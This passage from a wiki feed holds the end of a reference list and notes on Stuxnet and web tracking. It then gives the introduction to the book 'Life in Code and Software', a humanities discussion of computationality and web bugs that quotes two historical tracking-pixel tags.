Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4994</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4994"/>
		<updated>2012-06-21T11:12:01Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
